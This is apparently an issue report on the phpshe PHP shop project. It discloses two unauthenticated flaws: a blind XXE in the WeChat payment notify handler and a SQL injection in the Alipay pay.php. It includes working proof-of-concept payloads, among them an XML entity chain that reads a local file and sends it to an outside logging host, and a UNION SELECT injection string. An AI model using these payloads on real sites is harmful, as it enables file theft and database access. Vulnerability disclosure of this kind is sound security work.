17 Star 41 Fork 15

koyshe / phpshe

 / 详情

Two vulnerabiliyies without authentication

Backlog
Opened this issue  
2019-03-10 11:42

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, wechat_getxml function is called.
输入图片说明

wechat_getxml function is defined in hook/wechat.hook.php ,then pe_getxmlfunction is called.

输入图片说明

pe_getxml function is defined in include/function/global.func.php。simplexml_load_string() function is called to parse the xml from php://input. If the version of libxml lib < 2.9.0, simplexml_load_string() will parse the external entity in the default mod.

输入图片说明

the poc is as below:

/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>

test.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;

We can use it to read any file in the system.

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.

输入图片说明

Then the renturn value of order_table will be directly spliced into SQL statements as table name.

输入图片说明

So the poc is as below:

/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_

输入图片说明

Comments (0)

wps2015 createdtask

Sign in to comment

Status
Assignees
Milestones
Pull Requests
Successfully merging a pull request will close this issue.
Branches
Planed to start   -   Planed to end
-
Top level
Priority
参与者(1)
PHP
1
https://gitee.com/koyshe/phpshe.git
git@gitee.com:koyshe/phpshe.git
koyshe
phpshe
phpshe

Search